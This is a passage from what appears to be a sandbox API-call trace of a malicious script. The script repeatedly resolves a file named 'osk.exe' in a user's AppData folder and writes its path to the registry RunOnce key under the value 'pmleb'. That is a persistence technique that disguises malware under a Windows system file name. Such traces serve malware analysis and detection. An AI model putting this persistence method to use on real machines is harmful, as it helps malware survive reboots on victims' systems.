[6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.265] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x69 [0082.265] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.265] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6a [0082.266] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, 
dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.266] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x69 [0082.266] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.266] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.266] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.266] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.266] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.266] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.267] 
_mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.267] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.267] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.267] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.267] RegCloseKey (hKey=0x280) returned 0x0 [0082.267] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.267] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.267] SetTimer (hWnd=0x20280, nIDEvent=0x20e5, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e5 [0082.267] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.280] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.280] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.280] KillTimer (hWnd=0x20280, uIDEvent=0x20e5) returned 1 [0082.280] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.280] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.281] IUnknown:Release (This=0x787518) returned 0x1 [0082.281] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.281] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.281] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.281] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, 
[1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.281] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6a [0082.282] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.282] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6b [0082.282] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, 
wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.283] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6a [0082.283] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.283] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.283] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.283] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.283] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.283] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.283] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.284] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.284] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.284] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.284] RegCloseKey (hKey=0x280) returned 0x0 [0082.284] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.284] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.284] SetTimer (hWnd=0x20280, nIDEvent=0x20e6, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e6 [0082.285] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.295] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.295] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.296] KillTimer (hWnd=0x20280, uIDEvent=0x20e6) returned 1 [0082.296] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.296] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, 
Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.296] IUnknown:Release (This=0x787518) returned 0x1 [0082.296] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.296] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.296] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.297] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.297] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 
0x80004002 [0082.297] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.297] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.297] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.297] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.297] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6b [0082.297] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.297] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6c [0082.297] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.298] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6b [0082.298] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.298] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.298] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.298] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.298] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.298] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.298] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.298] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.299] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.299] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.299] RegCloseKey (hKey=0x280) returned 0x0 [0082.299] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.299] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.299] SetTimer (hWnd=0x20280, nIDEvent=0x20e7, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e7 [0082.299] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.311] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.311] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.311] KillTimer (hWnd=0x20280, uIDEvent=0x20e7) returned 1 [0082.311] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.312] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0082.312] IUnknown:Release (This=0x787518) returned 0x1 [0082.312] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.312] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.312] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.312] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.312] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.312] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
